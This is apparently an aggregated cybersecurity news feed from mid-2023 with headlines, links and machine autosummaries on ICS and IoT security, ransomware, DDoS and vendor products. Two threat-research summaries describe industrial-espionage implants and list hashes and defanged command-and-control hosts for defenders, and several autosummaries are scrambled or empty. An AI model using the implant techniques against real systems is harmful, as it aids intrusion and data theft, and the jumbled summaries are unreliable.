    2023-08-09 https://www.bleepingcomputer.com/news/security/preventative-medicine-for-securing-iot-tech-in-healthcare-organizations/
    Healthcare organizations are increasingly at risk from threat actors targeting Internet of Medical Things. Learn more from Outpost24 on how attack surface management can secure the IoMT devices. [...] "

    Autosummary: Cloud-based databases, network services, firmware, specific individual devices, storage systems, servers, and web-based apps can each contribute to either the safety or vulnerability of an overall system’s robust security program. Using a combination of specialist in-house expertise along with our proprietary automation platform and attack surface analysis tools, we can provide everything from a single point-in-time risk analysis to longer-term planning, execution, and metrics collection as you work to reduce your exposure to Internet-based attacks.The IoT provides enhanced AI-enabled communication between a wide variety of devices, including mobile phones, wearable devices, industrial sensors, and actuating ports, which convey information through cloud storage databases. This type of attack offers a wide range of potential for manipulating and extorting healthcare organizations, whose databases contain an abundant of sensitive information about patient medical histories, current health records, home addresses, and financial details. "

    ---

    NetRise unveils SBOM and vulnerability prioritization solutions to enhance XIoT firmware security

    exploits industry
    2023-08-09 https://www.helpnetsecurity.com/2023/08/09/netrise-platform-sbom/
    

    NetRise announced advanced capabilities for maintaining and working with Software Bill of Materials (SBOMs) and support for the CISA’s KEV Catalog for managing and understanding the risks associated with software components in the firmware of connected devices. As the security of the software and firmware supply chain and regulation around SBOMs continue to dominate the industry landscape, the impact of consuming and generating a list of ‘ingredients’ for each device cannot be overstated. With the … More →

    The post NetRise unveils SBOM and vulnerability prioritization solutions to enhance XIoT firmware security appeared first on Help Net Security.

    "

    Autosummary: “Our goal is to alleviate the significant struggles that manufacturers, enterprises, and consultants globally face today when securing XIoT software and firmware, not only when building these products but also understanding the latent risk and impact of the latest exploitable vulnerability on devices in the field,” said Thomas Pace, CEO of NetRise. "

    ---

    Dynatrace Security Analytics detects and blocks common application attacks

    industry
    2023-08-09 https://www.helpnetsecurity.com/2023/08/09/dynatrace-security-analytics/
    

    Dynatrace introduced Security Analytics, a new Dynatrace platform solution designed to help organizations better defend against threats to their hybrid and multicloud environments. Dynatrace Security Analytics leverages Davis AI, which combines predictive and causal AI techniques to provide security analysts with the precise answers and data context they need to prioritize and investigate threats and vulnerabilities. Later this year, Security Analytics will also include generative AI capabilities as part of Dynatrace’s planned expansion to provide … More →

    The post Dynatrace Security Analytics detects and blocks common application attacks appeared first on Help Net Security.

    "

    Autosummary: Today’s security analytics platforms combine features to enable analytics, investigation, automation, threat hunting, dashboards, and reporting to help security analysts be more effective.” "

    ---

    Ransomware attacks cost manufacturing sector $46 billion in downtime since 2018, report claims

    exploits industry
    2023-08-04 https://www.tripwire.com/state-of-security/ransomware-attacks-cost-manufacturing-sector-46-billion-downtime-2018-report
    Newly-released research reveals the eye-watering costs that the manufacturing sector has suffered in recent years at the hands of ransomware. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: "

    ---

    Microsoft Exposes Russian Hackers" Sneaky Phishing Tactics via Microsoft Teams Chats

    financial industry rusia-ucrania
    2023-08-03 https://thehackernews.com/2023/08/microsoft-exposes-russian-hackers.html
    Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It"s also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. "

    Autosummary: " Microsoft said the campaign, observed since at least late May 2023, affected less than 40 organizations globally spanning government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. "

    ---

    Hacktivists fund their operations using common cybercrime tactics

    industry
    2023-08-03 https://www.bleepingcomputer.com/news/security/hacktivists-fund-their-operations-using-common-cybercrime-tactics/
    Hacktivist groups that operate for political or ideological motives employ a broad range of funding methods to support their operations. [...] "

    Autosummary: Finally, Killnet has attempted to extort victims into paying ransom to stop DDoS attacks or delete stolen data, like in the case of RuTor in August 2022, BlackSprut in November 2022, the Latvian government in November 2022, and NATO in April 2023. Killnet set up a hack-for-hire service in March 2023, announced a new DDoS-for-hire service in July 2023, and launched a "Dark School" training program selling nine hacking courses to interested hackers in May 2023. "

    ---

    Industrial Control Systems Vulnerabilities Soar: Over One-Third Unpatched in 2023

    industry
    2023-08-02 https://thehackernews.com/2023/08/industrial-control-systems.html
    About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year. According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of "

    Autosummary: Some of the other notable findings are as follows - Mitsubishi Electric (20.5%), Siemens (18.2%), and Rockwell Automation (15.9%) were the most impacted vendors in the critical manufacturing sector Hitachi Energy (39.5%), Advantech (10.5%), Delta Electronics, and Rockwell Automation (both 7.9%) were the most impacted vendors in the energy sector Siemens emerged as the leading entity producing the most CVEs through the first half of 2023, accounting for 41 ICS advisories Use after free, out-of-bounds read, improper input validation, out-of-bounds write, and race condition were the top five software weaknesses "

    ---

    Warning over medical clinics using fake Google reviews

    industry
    2023-08-01 https://www.bbc.co.uk/news/technology-66329833?at_medium=RSS&at_campaign=KARANGA
    The BBC tracked down UK companies using fake reviews to boost their visibility in Google results. "

    Autosummary: "

    ---

    Common TTPs of attacks against industrial organizations. Implants for gathering data

    industry
    2023-07-31 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-gathering-data/
    This part of the research is devoted to second stage malware used to gather data on infected systems of industrial organizations. "

    Autosummary: --2 , it restarts itself with parameter --1 , it restarts itself with parameter When run with parameter --1 , it starts the “msiexec.exe” process, reads and decrypts the payload, and injects it into the memory of the “msiexec.exe” process Once the payload starts to be executed in the memory of “msiexec.exe”, it runs into an endless loop consisting of 6 simple steps: Create folders for file storage (if they do not exist) and find the path to “WinRar.exe” Decrypt strings Read config and start searching for files on all disks Copy files and write log Archive copied files and clean up Sleep for 10 minutes Main loop of the implant designed to collect local files First, the implant creates the folder “C:\ProgramData\NetWorks”, then it creates one subfolder for temporary file storage (“C:\ProgramData\NetWorks\fl”) and one subfolder for archived data storage (“C:\ProgramData\NetWorks\ZZ”). The implant also checks “%TEMP%\TCABC8.tmp” for the following files that are used to infect a removable drive whose serial number matches the name of the folder: “mcods.exe”, which is a legitimate McAfee executable vulnerable to DLL hijacking “McVsoCfg.dll”, which is the second-step payload “DOC”, “PDF” or “DIR” files, which define the lure link file to be used It is obvious that the presence of the files mentioned above in the folder assigned to a specific removable drive indicates that the attackers first analyze the contents of removable drives for some time and only then copy the files used to infect a specific removable drive to the folder specified. Dedicated implant for gathering local files MD5 4C1ADC1778CE07CD655DB129AF1DA7E0 (DynTray.dll) 71D919105627C67AB9FB9A7152015CF6 (Data) Stack of implants used to exfiltrate data from air-gapped networks MD5 3E22E7F5A6EE0A7D3D9A5CBFA7939C98 (tmp.exe) 2DB858C4CA836120D3124EB5490195EA (main.ini) D2D7FD5C7372CD81D6BC4199F211A42C (RtkAudio.exe) 4D5963B7D931A02265EA5231961935E9 (mcvsocfg.dll) 3A532B8481F22B78ABC718AC5CDB3F06 (msgui.exe) 36A029CB62BFCB86394B49E5ACF36BEF (SCR) 1DBC1DEFC2AC6578D83D5C45D9836482 (abbyfine.exe) 9F402F0B2C84ED577E9EE76DCF640B70 (f04803w3.exe) 0E69850A0F67165D4E3D06987D14B2E6 (automonitor.exe) C929DCC69CF6546D56C2A68D31D7728D ($rjkdi4v.exe) Appendix II – MITRE ATT&CK Mapping File structure of a temp folder on an infected host and an infected removable drive Then, depending on the config and the extension (“DOC”, “PDF”, or “DIR”) of the file found in the temp directory, the main module recursively searches the drive’s root path for either a file (with the extension “.docx” or “.pdf”) or a folder. Fragment of the second-step worm, “McVsoCfg.dll” – removing itself from the infected drive Step 3 The third-step implant, “msgui.exe”, is quite small and simple – it is designed to execute a batch script with “cmd.exe” to collect data and save the output to the drive’s “$RECYCLE.BIN” folder so that it can be collected by the main module of the malware (when connected to the originally infected host). Fragment of the “msgui.exe” implant’s CMD commands used to gather information Fragment of the third-step malware, “msgui.exe”, designed to collect host info and run fourth-step malware (if it exists) Step 4 The fourth-step malware consists of two files: A simple dropper of the payload (similar to that used by second-step malware) Depending on their settings, both modules may collect information about a drive, as well as capture screenshots and window titles on the infected host, search for and copy documents (.doc, .docx, .xls, .xlsx, .ppt, .pptx) and images (.png, .jpeg, .jpg, .bmp). "

    ---

    Israel"s largest oil refinery website offline amid cyber attack claims

    industry
    2023-07-30 https://www.bleepingcomputer.com/news/security/israels-largest-oil-refinery-website-offline-amid-cyber-attack-claims/
    Website of Israel"s largest oil refinery operator, BAZAN Group is inaccessible from most parts of the world as threat actors claim to have hacked the Group"s cyber systems. [...] "

    Autosummary: Bazan Group website shows an "Access Denied" error message (BleepingComputer) Cyber Avengers claims responsibility In a Telegram channel, Iranian hacktivist group, "Cyber Avengers" aka "CyberAv3ngers", has claimed responsibility for breaching BAZAN"s network. "

    ---

    Israel"s largest oil refinery website offline after DDoS attack

    industry
    2023-07-30 https://www.bleepingcomputer.com/news/security/israels-largest-oil-refinery-website-offline-after-ddos-attack/
    Website of Israel"s largest oil refinery operator, BAZAN Group is inaccessible from most parts of the world as threat actors claim to have hacked the Group"s cyber systems. [...] "

    Autosummary: These included diagrams of "Flare Gas Recovery Unit," "Amine Regeneration" system, a petrochemical "Splitter Section," and PLC code, as seen by BleepingComputer. "

    ---

    The Week in Ransomware - July 28th 2023 - New extortion tactics

    exploits ransomware industry
    2023-07-28 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-28th-2023-new-extortion-tactics/
    With ransom payments declining, ransomware gangs are evolving their extortion tactics to utilize new methods to pressure victims. [...] "

    Autosummary: Finally, we learned more about some recent attacks: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwareforme, @BleepinComputer, @LawrenceAbrams, @demonslay335, @struppigel, @DanielGallagher, @malwrhunterteam, @VK_Intel, @serghei, @fwosar, @Ionut_Ilascu, @FourOctets, @jorntvdw, @PolarToffee, @jgreigj, @BrettCallow, @SophosXOps, @eSentire, @vxunderground, @AlvieriD, and @pcrisk. "

    ---

    Heart monitor manufacturer hit by cyberattack, takes systems offline

    industry ciber
    2023-07-27 https://www.bitdefender.com/blog/hotforsecurity/heart-monitor-manufacturer-hit-by-cyberattack-takes-systems-offline/
    CardioComm, a Canadian company which provides heart-monitoring technology to hospitals and consumers, has revealed that it has been forced to take its systems offline following a cyberattack. Read more in my article on the Hot for Security blog. "

    Autosummary: Error. "

    ---

    SeeMetrics Security Performance Boards empowers CISOs to validate security programs

    industry
    2023-07-26 https://www.helpnetsecurity.com/2023/07/26/seemetrics-security-performance-boards/
    

    SeeMetrics launched its new Security Performance Boards. Organized by security domains, the new Security Performance Boards are a collection of out-of-the box metrics that empower security leaders to measure the performance of their technologies, processes, and people in real time. SeeMetrics is the first ever data platform that drives cybersecurity performance assessment directly from the operational stack and “inside the perimeter”. With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and … More →

    The post SeeMetrics Security Performance Boards empowers CISOs to validate security programs appeared first on Help Net Security.

    "

    Autosummary: With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and business-aligned view of measurements, metrics, and Key Performance Indicators (KPIs), which shows trends, risks, and historical context. "

    ---

    Microsoft previews Defender for IoT firmware analysis service

    industry
    2023-07-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-previews-defender-for-iot-firmware-analysis-service/
    Microsoft announced the public preview of a new Defender for IoT feature that helps analyze the firmware of embedded Linux devices like routers for security vulnerabilities and common weaknesses. [...] "

    Autosummary: "

    ---

    Windows 11 23H2 getting an energy report with app"s power usage

    industry
    2023-07-22 https://www.bleepingcomputer.com/news/microsoft/windows-11-23h2-getting-an-energy-report-with-apps-power-usage/
    Microsoft is making it easier to see how much energy your apps use in Windows 11 over a given period by introducing a detailed power consumption page in the latest 23H2 update. [...] "

    Autosummary: Battery usage per app on Windows 11"s energy page In addition, the page includes a section for "battery usage per app", allowing users to select between “Total usage”, “In use”, “Background”, and “Name”. "

    ---

    Brazil"s Embraer plans to build electric flying taxi factory near Sao Paolo

    latam industry
    2023-07-21 https://www.bbc.co.uk/news/world-latin-america-66264229?at_medium=RSS&at_campaign=KARANGA
    Embraer says it will build electric aircraft with hopes they will take flight from 2026. "

    Autosummary: "

    ---

    Attackers intensify DDoS attacks with new tactics

    industry
    2023-07-21 https://www.helpnetsecurity.com/2023/07/21/ddos-attacks-h1-2023/
    

    As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks, according to Gcore. The maximum attack power rose from 600 to 800 Gbps. UDP flood attacks were most common and amounted to 52% of total attacks, while SYN flood accounted for 24%. In third place was TCP flood. The most-attacked business sectors are gaming, telecom, and financial. The longest attack duration in Q2/Q3 was seven days, 16 hours, and 22 minutes. … More →

    The post Attackers intensify DDoS attacks with new tactics appeared first on Help Net Security.

    "

    Autosummary: The increase in the DDoS attack volume in the H1 of 2023 There has been a significant increase in the power and volume of DDoS attacks over the last two years: In 2021, the capacity of DDoS attacks was up to 300 Gbps. "

    ---

    Common TTPs of attacks against industrial organizations. Implants for remote access

    industry
    2023-07-20 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-remote-access/
    In this article (which is the first part of the report) we analyze common TTPs of implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations. "

    Autosummary: Win32.MeatBall MD5 FFF248DB8066AE3D30274996BAEDDAB6 (oleacc.dll) C2 IP/URL freetranslatecenter[.]com help.freetranslatecenter[.]com onlinenewscentral[.]com onlinemapservices[.]com search.onlinemapservices[.]com help.onlinemapservices[.]com apps.onlinemapservices[.]com edit.onlinemapservices[.]com booking-onlines[.]com 81.28.13[.]74 92.38.160[.]142 92.38.188[.]135 92.38.190[.]55 103.221.222[.]133 193.109.78[.]243 193.124.112[.]206 194.87.95[.]125 Implant using Yandex Cloud as C2 MD5 A05D6D7A6A1E9669FC4C61223DA3953F (dbghelp.dll) 2F5C889A819CFE0804005F7CE5FD956E (vmService.pkg) Appendix II – MITRE ATT&CK Mapping The table below contains all the TTPs identified in the analysis of the activity described in this report. Variants of FourteenHi MD5 7332710D10B26A5970C5A1DDF7C83FBA (mpsvc.dll) 2A1CFA6D17627EAAA7A63F73038A93DA (taskhost.doc) BB02A5D3E8807D7B13BE46AD478F7FBB (cclib.dll) 22E66E0BE712F2843D8DB22060088751 (ToastUI.exe.png) D75C7BD965C168D693CE8294138136AE (ToastUI.exe.dat) C2 IP/URL sfb.odk-saturn[.]com/dialin/login 87.121.52[.]86 Backdoor.They accept a relatively long list of commands, including: upload arbitrary files, download arbitrary files, run arbitrary commands, set communication delay, start reverse shell, terminate own process and remove persistence. Strings found in a sample which uses Yandex Disk Log containing the result of command execution using cmd Conclusion The tendency to abuse cloud services (e.g., Dropbox, Yandex, Google, etc.) is not new, but it continues to expand, because it is hard to restrict / mitigate in cases when an organization’s business processes depend on using such services. The entire stack of implants used in attacks can be divided into three categories based on their roles: First-stage implants for persistent remote access and initial data gathering Second-stage implants for gathering data and files, including from air-gapped systems Third-stage implants and tools used to upload data to C2 In this article (which is the first part of the report) we analyze common TTPs of first-stage implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations. Computer name User name IP address MAC address OS version Path to %System% To upload the data collected to C2, the implant sends a request using an embedded API token to create a directory with a name that is unique to the victim host. "

    ---

    Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments

    industry
    2023-07-20 https://www.helpnetsecurity.com/2023/07/20/impinj-m800-series-rain-rfid-tag-chips/
    

    Impinj released the Impinj M800 series RAIN RFID tag chips to meet enterprise needs for item connectivity in global IoT deployments. The new M800 series delivers readability in enterprise deployments and offers enhanced tag reliability and manufacturability. The new chips demonstrate Impinj’s ongoing commitment to increase the speed, distance, and reliability at which a RAIN RFID system can discover, engage, and protect connected items. “Today, we have taken another big step toward our mission to … More →

    The post Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments appeared first on Help Net Security.

    "

    Autosummary: Improving tag readability, reliability, and manufacturability The Impinj M800 series, comprising the M830 and M850 tag chips, sets new performance benchmarks while improving features of the Impinj M700 series: Improved tag readability. "

    ---

    ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder

    industry
    2023-07-20 https://securityaffairs.com/148651/hacking/alphv-blackcat-clop-estee-lauder.html
    

    The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors, ALPHV/BlackCat and Clop, claim to have hacked the cosmetics giant company Estée Lauder and added the company to their Tor leak […]

    The post ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder appeared first on Security Affairs.

    "

    Autosummary: Even if the company did not share details about the attack, it is likely that the Clop ransomware group has breached its network by exploiting the MoVEit Transfer zero-day vulnerability Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Paris 2024 Olympics: Concern over French plan for AI surveillance

    industry
    2023-07-19 https://www.bbc.co.uk/news/world-europe-66122743?at_medium=RSS&at_campaign=KARANGA
    CCTV will use algorithms to detect fights and abandoned bags - but not everyone is happy about it. "

    Autosummary: "

    ---

    CERT-UA Uncovers Gamaredon"s Rapid Data Exfiltration Tactics Following Initial Compromise

    industry
    2023-07-17 https://thehackernews.com/2023/07/cert-ua-uncovers-gamaredons-rapid-data.html
    The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in "

    Autosummary: According to CERT-UA, GammaSteel is used to exfiltrate files matching a specific set of extensions – .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, and .mdb "

    ---

    Growing a 15,000 strong automotive cybersecurity group with John Heldreth

    industry ciber
    2023-07-17 https://www.helpnetsecurity.com/2023/07/17/automotive-cybersecurity-john-heldreth/
    

    The furry in which the automotive community pried, prodded, and eventually outsmarted existing functions that are software-driven is nothing short of horrifying. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea. Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise … More →

    The post Growing a 15,000 strong automotive cybersecurity group with John Heldreth appeared first on Help Net Security.

    "

    Autosummary: “For me this means bringing all of those different systems together into a centralized place where you can organize, identify by time or by product, by asset, and so on, so that you can understand the full picture,” said John. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea.“What we’re trying to do, of course, is to reduce any risk to our customers,” said John.Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise in cyber threats targeted at their vehicles. "

    ---

    GST: New tax threatens India"s booming online gaming industry

    industry
    2023-07-13 https://www.bbc.co.uk/news/world-asia-india-66161596?at_medium=RSS&at_campaign=KARANGA
    The industry says it has been blindsided by the government"s "catastrophic" tax decision. "

    Autosummary: "

    ---

    Rockwell Automation ControlLogix Bugs Expose Industrial Systems to Remote Attacks

    exploits industry
    2023-07-13 https://thehackernews.com/2023/07/rockwell-automation-controllogix-bugs.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has alerted of two security flaws impacting Rockwell Automation ControlLogix EtherNet/IP (ENIP) communication module models that could be exploited to achieve remote code execution and denial-of-service (DoS). "The results and impact of exploiting these vulnerabilities vary depending on the ControlLogix system configuration, but "

    Autosummary: Join Today Impacted devices include 1756-EN2T, 1756-EN2TK, 1756-EN2TXT, 1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT, 1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT, 1756-EN2F, 1756-EN2FK, 1756-EN3TR, 1756-EN3TRK, 1756-EN4TR, 1756-EN4TRK, and 1756-EN4TRXT. "

    ---

    SonicWall urges organizations to fix critical flaws in GMS/Analytics products

    industry
    2023-07-13 https://securityaffairs.com/148411/security/sonicwall-critical-flaws-gms-analytics.html
    

    SonicWall fixed multiple critical vulnerabilities impacting its GMS firewall management and Analytics management and reporting engine. SonicWall addressed multiple critical vulnerabilities in its Global Management System (GMS) firewall management and Analytics network management and reporting engine. The company fixed 15 vulnerabilities that were disclosed in a Coordinated Vulnerability Disclosure (CVD) report in conjunction with NCCGroup. […]

    The post SonicWall urges organizations to fix critical flaws in GMS/Analytics products appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Unnamed APT eyes vulnerabilities in Rockwell Automation industrial contollers (CVE-2023-3595 CVE-2023-3596)

    industry
    2023-07-13 https://www.helpnetsecurity.com/2023/07/13/cve-2023-3595-cve-2023-3596/
    

    Rockwell Automation has fixed two vulnerabilities (CVE-2023-3595, CVE-2023-3596) in the communication modules of its ControlLogix industrial programmable logic controllers (PLCs), ahead of expected (and likely) in-the-wild exploitation. “An unreleased exploit capability leveraging these vulnerabilities is associated with an unnamed APT (Advanced Persistent Threat) group,” industrial cybersecurity company Dragos has stated on Wednesday. About the vulnerabilities (CVE-2023-3595, CVE-2023-3596) CVE-2023-3595 allows attackers to manipulate firmware memory, perform remote code execution with persistence, and modify, deny, and exfiltrate … More →

    The post Unnamed APT eyes vulnerabilities in Rockwell Automation industrial contollers (CVE-2023-3595 CVE-2023-3596) appeared first on Help Net Security.

    "

    Autosummary: CIP Socket Object should be disabled, if possible, they say, and organizations should monitor for: Unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules Unknown scanning on a network for CIP-enabled devices Unscheduled firmware updates or logic downloads Unexpected disabling of secure boot options Arbitrary writes to communication module memory or firmware Uncommon firmware file names “Knowing about an APT-owned vulnerability before exploitation is a rare opportunity for proactive defense for critical industrial sectors. "

    ---

    Staying ahead of the “professionals”: The service-oriented ransomware crime industry

    exploits ransomware industry
    2023-07-12 https://www.helpnetsecurity.com/2023/07/12/ransomware-industry-profitability/
    

    Ransomware has been a hugely profitable industry for criminal gangs for the last few years. The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional. These groups are emulating the legitimate tech ecosystem and seeking greater efficiencies and profits: they outsource common, complex problems; they subcontract work; and they employ … More →

    The post Staying ahead of the “professionals”: The service-oriented ransomware crime industry appeared first on Help Net Security.

    "

    Autosummary: Have a incident response plan – If you have threat intelligence, self-awareness, controls, and policies, you can devise a plan of action for your organization to follow in the event of an incident. Actions on target are often achieved by living off the land, i.e., abusing already present operating system tools and the use of common commodity post-exploitation frameworks such as Cobalt Strike, Metasploit, and Sliver. "

    ---

    DirectDefense partners with SCADAfence to strengthen industrial cybersecurity

    industry ciber
    2023-07-12 https://www.helpnetsecurity.com/2023/07/12/directdefense-scadafence/
    

    DirectDefense announced its partnership with SCADAfence to enhance industrial cybersecurity and safeguard OT Networks in the era of IIoT. The SCADAfence Platform enables critical infrastructure and manufacturing organizations with complex Operational Technology (OT) networks to embrace the benefits of the Industrial Internet of Things (IIoT) by reducing cyber risks and mitigating operational threats. With the rise of the IIoT, OT devices are becoming more interconnected, allowing for enhanced automation and remote monitoring. While these technologies … More →

    The post DirectDefense partners with SCADAfence to strengthen industrial cybersecurity appeared first on Help Net Security.

    "

    Autosummary: By leveraging advanced algorithms, machine learning, and AI, it automatically discovers assets, detects anomalies, and identifies security risks that can compromise the availability and reliability of OT networks. "

    ---

    CyberCatch collaborates with Proficioto to protect users against cyber threats

    industry
    2023-07-12 https://www.helpnetsecurity.com/2023/07/12/cybercatch-proficio/
    

    CyberCatch and Proficio announced a strategic partnership to join forces to market and deliver a combined AI-enabled solution for organizations worldwide. CyberCatch’s proprietary, artificial intelligence-enabled (AI) Software-as-a-Service (SaaS) solution is designed to help organizations implement all mandated and necessary controls, detect control failures promptly, and facilitate their resolution, enabling continuous compliance and cyber risk mitigation. Proficio’s MDR services provide round-the-clock protection, enabling organizations to proactively identify and respond to potential threats in real-time. With an … More →

    The post CyberCatch collaborates with Proficioto to protect users against cyber threats appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Industry responses and strategies for navigating the tides of DDoS attacks

    industry
    2023-07-11 https://www.helpnetsecurity.com/2023/07/11/ddos-attacks-fight-video/
    

    It is important not to underestimate the potentially devastating impact of DDoS attacks. Organizations of all sizes should take proactive measures to mitigate and safeguard against DDoS attacks, ensuring the continuity and resilience of their operations. Throughout this Help Net Security video round-up, experts emphasize the need for a collective effort in the fight against DDoS attacks. Complete videos Bryant Rump, Principal Security Architect at Neustar Security Services, talks about the challenges of mitigating immense … More →

    The post Industry responses and strategies for navigating the tides of DDoS attacks appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Foxconn: Apple supplier drops out of $20bn India factory plan

    industry
    2023-07-11 https://www.bbc.co.uk/news/business-66160997?at_medium=RSS&at_campaign=KARANGA
    Some analysts say Foxconn"s decision marks a setback to the country"s technology industry ambitions. "

    Autosummary: "

    ---

    Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes

    financial industry
    2023-07-11 https://www.helpnetsecurity.com/2023/07/11/alteryx-analytics-automation/
    

    Alteryx announced decision intelligence and intelligent automation capabilities on AWS designed to empower chief financial officers (CFOs) and finance leaders to embrace cloud and data analytics as strategic tools for their modernization goals. “Analytic insights help us tailor digital transformation solutions based on our clients’ needs to achieve the greatest impact for their business,” said Ana Margarita Albir, president at ADL Labs. “Leveraging Alteryx and AWS, we are able to integrate capabilities across any data … More →

    The post Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes appeared first on Help Net Security.

    "

    Autosummary: “Organizations can benefit from templates that help data analysts and line-of-business users to use, customize, extend, and integrate enterprise data with intelligent automation workflows that assist with record to report, procure to pay, and order to cash processes.” "

    ---

    Honeywell acquires SCADAfence to strengthen its OT cybersecurity portfolio

    industry ciber
    2023-07-10 https://www.helpnetsecurity.com/2023/07/10/honeywell-scadafence/
    

    Honeywell has agreed to acquire SCADAfence, a provider of OT and IoT cybersecurity solutions for monitoring large-scale networks. SCADAfence brings proven capabilities in asset discovery, threat detection and security governance which are key to industrial and buildings management cybersecurity programs. The OT cybersecurity industry is expected to grow to greater than $10 billion in the next several years. Particularly in the industrial sector, cyberattacks focused on OT systems can be a significant source of unplanned … More →

    The post Honeywell acquires SCADAfence to strengthen its OT cybersecurity portfolio appeared first on Help Net Security.

    "

    Autosummary: “SCADAfence is an ideal complement to Honeywell’s OT cybersecurity portfolio and, when combined with the Honeywell Forge Cybersecurity+ suite, it enables us to provide an end-to-end solution with applicability to asset, site and enterprise across key Honeywell sectors,” said Dehoff. "

    ---

    Over 130,000 solar energy monitoring systems exposed online

    industry
    2023-07-06 https://www.bleepingcomputer.com/news/security/over-130-000-solar-energy-monitoring-systems-exposed-online/
    Security researchers are warning that tens of thousands of photovoltaic (PV) monitoring and diagnostic systems are reachable over the public web, making them potential targets for hackers. [...] "

    Autosummary: "

    ---

    CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector

    exploits industry
    2023-07-06 https://securityaffairs.com/148216/hacking/solarview-flaws-energy-sector.html
    

    A vulnerability in SolarView product can be exploited in attacks targeting organizations in the energy sector. Researchers from the cybersecurity firm VulnCheck reported that the vulnerability CVE-2022-29303 in the solar power monitoring Contec SolarView product can be exploited in attacks targeting organizations in the energy sector. CVE-2022-29303 is an unauthenticated and remote command injection vulnerability […]

    The post CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector appeared first on Security Affairs.

    "

    Autosummary: Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats

    exploits industry
    2023-07-06 https://www.helpnetsecurity.com/2023/07/06/txone-networks-stellar/
    

    TXOne Networks announced its Stellar solution for defending operational stability. Employing TXOne Networks’ approach to security, Cyber-Physical System Detection and Response (CPSDR), Stellar supports the priorities of security and operations without either team having to sacrifice capability or performance. Already protecting customers in semiconductors, manufacturing, oil and gas, automotive, pharmaceuticals and many other industries, Stellar offers seamless detection and prevention capabilities with complete oversight for legacy and new OT devices. With intuitive management and informed … More →

    The post TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Surviving the 800 Gbps Storm: Gain Insights from Gcore"s 2023 DDoS Attack Statistics

    industry
    2023-07-06 https://thehackernews.com/2023/07/surviving-800-gbps-storm-gain-insights.html
    Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends. This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the "

    Autosummary: Attack type spread, Q1–Q2 2023 Alt Text: Attack types illustrated: 52% - UDP, 24% - SYN flood, 19% - TCP flood, 5% - other traffic According to Andrey Slastenov, Head of Web Security at Gcore, there has been an increase in the frequency of complex, multi-vector attacks by attackers. Alt Text: Attack types illustrated: 30.1% - Gaming, 24.7% - Telecom, 16.8% - Financial, 28.4% - Other The gaming industry was the most targeted sector, accounting for a considerable proportion of the DDoS attacks. "

    ---

    How ransomware impacts the healthcare industry

    exploits ransomware industry
    2023-07-05 https://www.helpnetsecurity.com/2023/07/05/how-ransomware-impacts-healthcare-industry-video/
    

